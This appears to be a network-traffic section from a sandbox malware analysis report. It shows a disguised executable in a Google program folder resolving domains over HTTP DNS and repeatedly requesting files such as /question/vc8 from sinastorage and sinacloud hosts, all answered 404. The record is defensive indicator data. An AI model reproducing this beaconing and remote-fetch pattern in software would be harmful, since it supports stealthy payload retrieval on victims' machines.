                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:40.284688950 CET88OUTGET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 114.114.114.114


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                28192.168.2.549790183.60.95.221805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:43.126562119 CET245OUTGET /question/2024-12-05/21_22 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:44.691282034 CET536INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:25:44 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 7465e5e1-2412-0521-2544-047bcb4b7810
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 65 32 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 32 30 32 34 2d 31 32 2d 30 35 2f 32 31 5f 32 32 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 34 36 35 65 35 65 31 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 34 34 2d 30 34 37 62 63 62 34 62 37 38 31 30 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>7465e5e1-2412-0521-2544-047bcb4b7810</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                29192.168.2.549791183.60.95.221805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:43.127466917 CET237OUTGET /question/data.txt HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:44.677705050 CET528INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:25:44 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 746f197e-2412-0521-2544-047bcb4b7614
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 64 61 74 61 2e 74 78 74 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 34 36 66 31 39 37 65 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 34 34 2d 30 34 37 62 63 62 34 62 37 36 31 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>746f197e-2412-0521-2544-047bcb4b7614</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                30192.168.2.549792114.114.114.114805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:43.505218983 CET88OUTGET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 114.114.114.114


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                31192.168.2.549796119.29.29.29805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:44.915630102 CET84OUTGET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:25:46.336008072 CET114INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 10
                                                                                Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
                                                                                Data Ascii: 49.7.37.97


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                32192.168.2.549797119.29.29.29805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:44.915631056 CET84OUTGET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:25:46.334748983 CET114INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 10
                                                                                Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
                                                                                Data Ascii: 49.7.37.97


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                33192.168.2.549799182.254.116.116805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:44.915756941 CET87OUTGET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:25:46.960834980 CET114INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 10
                                                                                Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
                                                                                Data Ascii: 49.7.37.97


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                34192.168.2.549798182.254.116.116805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:44.915976048 CET87OUTGET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:25:46.960572958 CET114INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 10
                                                                                Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
                                                                                Data Ascii: 49.7.37.97


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                35192.168.2.54980549.7.37.97805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:46.463459015 CET237OUTGET /question/data.txt HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:48.021922112 CET528INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:25:47 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 34f09294-2412-0521-2547-6c92bfce66de
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 64 61 74 61 2e 74 78 74 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 34 66 30 39 32 39 34 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 34 37 2d 36 63 39 32 62 66 63 65 36 36 64 65 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>34f09294-2412-0521-2547-6c92bfce66de</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                36192.168.2.54980649.7.37.97805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:46.463852882 CET245OUTGET /question/2024-12-05/21_22 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:48.036273956 CET536INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:25:47 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 345c5bc1-2412-0521-2547-0894eff93894
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 65 32 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 32 30 32 34 2d 31 32 2d 30 35 2f 32 31 5f 32 32 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 34 35 63 35 62 63 31 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 34 37 2d 30 38 39 34 65 66 66 39 33 38 39 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>345c5bc1-2412-0521-2547-0894eff93894</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                37192.168.2.549809123.126.45.208805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:48.165139914 CET233OUTGET /question/vc8 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:49.741013050 CET523INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:25:49 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 32eda46f-2412-0521-2549-b4055d752c2c
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 76 63 38 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 65 64 61 34 36 66 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 34 39 2d 62 34 30 35 35 64 37 35 32 63 32 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>32eda46f-2412-0521-2549-b4055d752c2c</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                38192.168.2.549815183.60.95.221805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:49.872381926 CET233OUTGET /question/vc8 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:54.440876961 CET523INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:25:54 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 2c86cd27-2412-0521-2554-5ca7213e02e6
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 76 63 38 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 32 63 38 36 63 64 32 37 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 35 34 2d 35 63 61 37 32 31 33 65 30 32 65 36 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>2c86cd27-2412-0521-2554-5ca7213e02e6</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                39192.168.2.549827183.60.95.221805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:54.906795979 CET232OUTGET /question/vc8 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:57.042303085 CET523INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:25:56 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 76c934d1-2412-0521-2556-5ca7213e04cc
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 76 63 38 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 63 39 33 34 64 31 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 35 36 2d 35 63 61 37 32 31 33 65 30 34 63 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>76c934d1-2412-0521-2556-5ca7213e04cc</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                40192.168.2.54983349.7.37.97805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:57.169873953 CET232OUTGET /question/vc8 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:25:58.726234913 CET523INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22080916-2b967e2
                                                                                Date: Thu, 05 Dec 2024 13:25:58 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: c02a0fea-2412-0521-2558-0894eff93358
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 76 63 38 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 63 30 32 61 30 66 65 61 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 35 38 2d 30 38 39 34 65 66 66 39 33 33 35 38 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>c02a0fea-2412-0521-2558-0894eff93358</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                41192.168.2.54983727.221.16.149805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:25:59.101828098 CET231OUTGET /question/vc8 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:04.150521040 CET499INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:25:54 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 35eef701-2412-0521-2603-6c92bfce6724
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 76 63 38 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 35 65 65 66 37 30 31 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 30 33 2d 36 63 39 32 62 66 63 65 36 37 32 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>35eef701-2412-0521-2603-6c92bfce6724</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                42192.168.2.549846114.114.114.114805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:02.286087990 CET87OUTGET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 114.114.114.114


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                43192.168.2.54985027.221.16.179805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:04.282144070 CET231OUTGET /question/vc8 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:06.148055077 CET499INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:26:03 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 3461c14b-2412-0521-2605-0894eff939cc
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 76 63 38 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 34 36 31 63 31 34 62 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 30 35 2d 30 38 39 34 65 66 66 39 33 39 63 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>3461c14b-2412-0521-2605-0894eff939cc</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                44192.168.2.549854114.114.114.114805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:05.551978111 CET87OUTGET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: D74384FB8D2C9
                                                                                Host: 114.114.114.114


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                45192.168.2.54985727.221.16.149805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:06.277710915 CET231OUTGET /question/vc8 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:08.225368977 CET499INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:25:59 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 74772b1b-2412-0521-2607-047bcb4b651c
                                                                                x-error-code: NoSuchBucket
